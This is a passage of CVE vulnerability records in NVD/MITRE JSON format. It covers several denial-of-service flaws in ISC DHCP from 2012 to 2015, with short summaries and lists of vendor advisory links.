                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.x before 4.1-ESV-R12-P1, 4.2.x, and 4.3.x before 4.3.3-P1 allows remote attackers to cause a denial of service (application crash) via an invalid length field in a UDP IPv4 packet."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1034657",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1034657"
            },
            {
              "name": "openSUSE-SU-2016:0610",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00168.html"
            },
            {
              "name": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/",
              "refsource": "CONFIRM",
              "url": "https://blogs.sophos.com/2016/02/17/utm-up2date-9-354-released/"
            },
            {
              "name": "https://kb.isc.org/article/AA-01334",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-01334"
            },
            {
              "name": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/",
              "refsource": "CONFIRM",
              "url": "https://blogs.sophos.com/2016/02/29/utm-up2date-9-319-released/"
            },
            {
              "name": "FEDORA-2016-0c5bb21bf1",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/175594.html"
            },
            {
              "name": "DSA-3442",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2016/dsa-3442"
            },
            {
              "name": "USN-2868-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-2868-1"
            },
            {
              "name": "FEDORA-2016-adb533a418",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-January/176031.html"
            },
            {
              "name": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html",
              "refsource": "CONFIRM",
              "url": "http://www.oracle.com/technetwork/topics/security/bulletinjan2016-2867206.html"
            },
            {
              "name": "80703",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/80703"
            },
            {
              "name": "openSUSE-SU-2016:0601",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2016-02/msg00162.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2015-8605",
    "datePublished": "2016-01-14T22:00:00.000Z",
    "dateReserved": "2015-12-17T00:00:00.000Z",
    "dateUpdated": "2024-08-06T08:20:43.591Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2013-2494 (GCVE-0-2013-2494)

Vulnerability from nvd – Published: 2013-03-28 16:00 – Updated: 2024-09-16 19:52
Summary
libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T15:44:31.973Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00880/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-03-28T16:00:00.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00880/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-2494",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "libdns in ISC DHCP 4.2.x before 4.2.5-P1 allows remote name servers to cause a denial of service (memory consumption) via vectors involving a regular expression, as demonstrated by a memory-exhaustion attack against a machine running a dhcpd process, a related issue to CVE-2013-2266."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://kb.isc.org/article/AA-00880/",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00880/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-2494",
    "datePublished": "2013-03-28T16:00:00.000Z",
    "dateReserved": "2013-03-07T00:00:00.000Z",
    "dateUpdated": "2024-09-16T19:52:30.979Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3955 (GCVE-0-2012-3955)

Vulnerability from nvd – Published: 2012-09-14 10:00 – Updated: 2024-08-06 20:21
Summary
ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://lists.fedoraproject.org/pipermail/package-… vendor-advisory, x_refsource_FEDORA
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://www.ubuntu.com/usn/USN-1571-1 vendor-advisory, x_refsource_UBUNTU
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://www.debian.org/security/2012/dsa-2551 vendor-advisory, x_refsource_DEBIAN
http://secunia.com/advisories/51318 third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=… vendor-advisory, x_refsource_MANDRIVA
http://lists.fedoraproject.org/pipermail/package-… vendor-advisory, x_refsource_FEDORA
http://www.securityfocus.com/bid/55530 vdb-entry, x_refsource_BID
http://lists.fedoraproject.org/pipermail/package-… vendor-advisory, x_refsource_FEDORA
http://rhn.redhat.com/errata/RHSA-2013-0504.html vendor-advisory, x_refsource_REDHAT
https://blogs.oracle.com/sunsecurity/entry/cve_20… x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory, x_refsource_SUSE
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory, x_refsource_GENTOO
https://kb.isc.org/article/AA-00779 x_refsource_CONFIRM
http://www.securitytracker.com/id?1027528 vdb-entry, x_refsource_SECTRACK
Date Public
2012-09-12 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:21:04.060Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "FEDORA-2012-14149",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
          },
          {
            "name": "openSUSE-SU-2012:1252",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
          },
          {
            "name": "USN-1571-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-1571-1"
          },
          {
            "name": "openSUSE-SU-2012:1234",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
          },
          {
            "name": "DSA-2551",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2551"
          },
          {
            "name": "51318",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/51318"
          },
          {
            "name": "MDVSA-2012:153",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
          },
          {
            "name": "FEDORA-2012-13910",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
          },
          {
            "name": "55530",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/55530"
          },
          {
            "name": "FEDORA-2012-14076",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
          },
          {
            "name": "RHSA-2013:0504",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
          },
          {
            "name": "openSUSE-SU-2012:1254",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00779"
          },
          {
            "name": "1027528",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1027528"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-09-12T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2012-09-29T09:00:00.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "FEDORA-2012-14149",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
        },
        {
          "name": "openSUSE-SU-2012:1252",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
        },
        {
          "name": "USN-1571-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-1571-1"
        },
        {
          "name": "openSUSE-SU-2012:1234",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
        },
        {
          "name": "DSA-2551",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2551"
        },
        {
          "name": "51318",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/51318"
        },
        {
          "name": "MDVSA-2012:153",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
        },
        {
          "name": "FEDORA-2012-13910",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
        },
        {
          "name": "55530",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/55530"
        },
        {
          "name": "FEDORA-2012-14076",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
        },
        {
          "name": "RHSA-2013:0504",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
        },
        {
          "name": "openSUSE-SU-2012:1254",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00779"
        },
        {
          "name": "1027528",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1027528"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3955",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "ISC DHCP 4.1.x before 4.1-ESV-R7 and 4.2.x before 4.2.4-P2 allows remote attackers to cause a denial of service (daemon crash) in opportunistic circumstances by establishing an IPv6 lease in an environment where the lease expiration time is later reduced."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "FEDORA-2012-14149",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/088220.html"
            },
            {
              "name": "openSUSE-SU-2012:1252",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00103.html"
            },
            {
              "name": "USN-1571-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-1571-1"
            },
            {
              "name": "openSUSE-SU-2012:1234",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00088.html"
            },
            {
              "name": "DSA-2551",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2551"
            },
            {
              "name": "51318",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/51318"
            },
            {
              "name": "MDVSA-2012:153",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:153"
            },
            {
              "name": "FEDORA-2012-13910",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086992.html"
            },
            {
              "name": "55530",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/55530"
            },
            {
              "name": "FEDORA-2012-14076",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2012-October/088882.html"
            },
            {
              "name": "RHSA-2013:0504",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2013-0504.html"
            },
            {
              "name": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of",
              "refsource": "CONFIRM",
              "url": "https://blogs.oracle.com/sunsecurity/entry/cve_2012_3955_denial_of"
            },
            {
              "name": "openSUSE-SU-2012:1254",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-09/msg00105.html"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "https://kb.isc.org/article/AA-00779",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00779"
            },
            {
              "name": "1027528",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1027528"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3955",
    "datePublished": "2012-09-14T10:00:00.000Z",
    "dateReserved": "2012-07-11T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:21:04.060Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3954 (GCVE-0-2012-3954)

Vulnerability from nvd – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:21
Summary
Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://www.securitytracker.com/id?1027300 vdb-entry x_refsource_SECTRACK
http://www.debian.org/security/2012/dsa-2516 vendor-advisory x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2012-1141.html vendor-advisory x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=… vendor-advisory x_refsource_MANDRIVA
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory x_refsource_SUSE
http://www.mandriva.com/security/advisories?name=… vendor-advisory x_refsource_MANDRIVA
http://www.debian.org/security/2012/dsa-2519 vendor-advisory x_refsource_DEBIAN
http://www.ubuntu.com/usn/USN-1519-1 vendor-advisory x_refsource_UBUNTU
https://kb.isc.org/article/AA-00737 x_refsource_CONFIRM
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory x_refsource_GENTOO
http://www.securityfocus.com/bid/54665 vdb-entry x_refsource_BID
Date Public
2012-07-24 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:21:04.079Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1027300",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1027300"
          },
          {
            "name": "DSA-2516",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2516"
          },
          {
            "name": "RHSA-2012:1141",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
          },
          {
            "name": "MDVSA-2012:116",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
          },
          {
            "name": "openSUSE-SU-2012:1006",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
          },
          {
            "name": "MDVSA-2012:115",
            "tags": [
              "vendor-advisory",
              "x_refsource_MANDRIVA",
              "x_transferred"
            ],
            "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
          },
          {
            "name": "DSA-2519",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2012/dsa-2519"
          },
          {
            "name": "USN-1519-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "http://www.ubuntu.com/usn/USN-1519-1"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://kb.isc.org/article/AA-00737"
          },
          {
            "name": "GLSA-201301-06",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
          },
          {
            "name": "54665",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/54665"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2012-07-24T00:00:00.000Z",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-11-25T19:57:01.000Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1027300",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1027300"
        },
        {
          "name": "DSA-2516",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2516"
        },
        {
          "name": "RHSA-2012:1141",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
        },
        {
          "name": "MDVSA-2012:116",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
        },
        {
          "name": "openSUSE-SU-2012:1006",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
        },
        {
          "name": "MDVSA-2012:115",
          "tags": [
            "vendor-advisory",
            "x_refsource_MANDRIVA"
          ],
          "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
        },
        {
          "name": "DSA-2519",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2012/dsa-2519"
        },
        {
          "name": "USN-1519-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "http://www.ubuntu.com/usn/USN-1519-1"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://kb.isc.org/article/AA-00737"
        },
        {
          "name": "GLSA-201301-06",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
        },
        {
          "name": "54665",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/54665"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2012-3954",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple memory leaks in ISC DHCP 4.1.x and 4.2.x before 4.2.4-P1 and 4.1-ESV before 4.1-ESV-R6 allow remote attackers to cause a denial of service (memory consumption) by sending many requests."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1027300",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1027300"
            },
            {
              "name": "DSA-2516",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2516"
            },
            {
              "name": "RHSA-2012:1141",
              "refsource": "REDHAT",
              "url": "http://rhn.redhat.com/errata/RHSA-2012-1141.html"
            },
            {
              "name": "MDVSA-2012:116",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:116"
            },
            {
              "name": "openSUSE-SU-2012:1006",
              "refsource": "SUSE",
              "url": "http://lists.opensuse.org/opensuse-updates/2012-08/msg00030.html"
            },
            {
              "name": "MDVSA-2012:115",
              "refsource": "MANDRIVA",
              "url": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:115"
            },
            {
              "name": "DSA-2519",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2012/dsa-2519"
            },
            {
              "name": "USN-1519-1",
              "refsource": "UBUNTU",
              "url": "http://www.ubuntu.com/usn/USN-1519-1"
            },
            {
              "name": "https://kb.isc.org/article/AA-00737",
              "refsource": "CONFIRM",
              "url": "https://kb.isc.org/article/AA-00737"
            },
            {
              "name": "GLSA-201301-06",
              "refsource": "GENTOO",
              "url": "http://security.gentoo.org/glsa/glsa-201301-06.xml"
            },
            {
              "name": "54665",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/54665"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2012-3954",
    "datePublished": "2012-07-25T10:00:00.000Z",
    "dateReserved": "2012-07-11T00:00:00.000Z",
    "dateUpdated": "2024-08-06T20:21:04.079Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2012-3571 (GCVE-0-2012-3571)

Vulnerability from nvd – Published: 2012-07-25 10:00 – Updated: 2024-08-06 20:13
Summary
ISC DHCP 4.1.2 through 4.2.4 and 4.1-ESV before 4.1-ESV-R6 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed client identifier.
Severity
No CVSS data available.
CWE
  • n/a
Assigner
References
http://www.oracle.com/technetwork/topics/security… x_refsource_CONFIRM
https://kb.isc.org/article/AA-00712 x_refsource_CONFIRM
http://www.debian.org/security/2012/dsa-2516 vendor-advisory x_refsource_DEBIAN
http://rhn.redhat.com/errata/RHSA-2012-1141.html vendor-advisory x_refsource_REDHAT
http://www.mandriva.com/security/advisories?name=… vendor-advisory x_refsource_MANDRIVA
http://lists.opensuse.org/opensuse-updates/2012-0… vendor-advisory x_refsource_SUSE
http://kb.juniper.net/InfoCenter/index?page=conte… x_refsource_CONFIRM
http://www.mandriva.com/security/advisories?name=… vendor-advisory x_refsource_MANDRIVA
http://www.debian.org/security/2012/dsa-2519 vendor-advisory x_refsource_DEBIAN
http://www.ubuntu.com/usn/USN-1519-1 vendor-advisory x_refsource_UBUNTU
http://security.gentoo.org/glsa/glsa-201301-06.xml vendor-advisory x_refsource_GENTOO
http://rhn.redhat.com/errata/RHSA-2012-1140.html vendor-advisory x_refsource_REDHAT
http://www.securityfocus.com/bid/54665 vdb-entry x_refsource_BID
Date Public
2012-07-24 00:00

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T20:13:51.326Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
          },
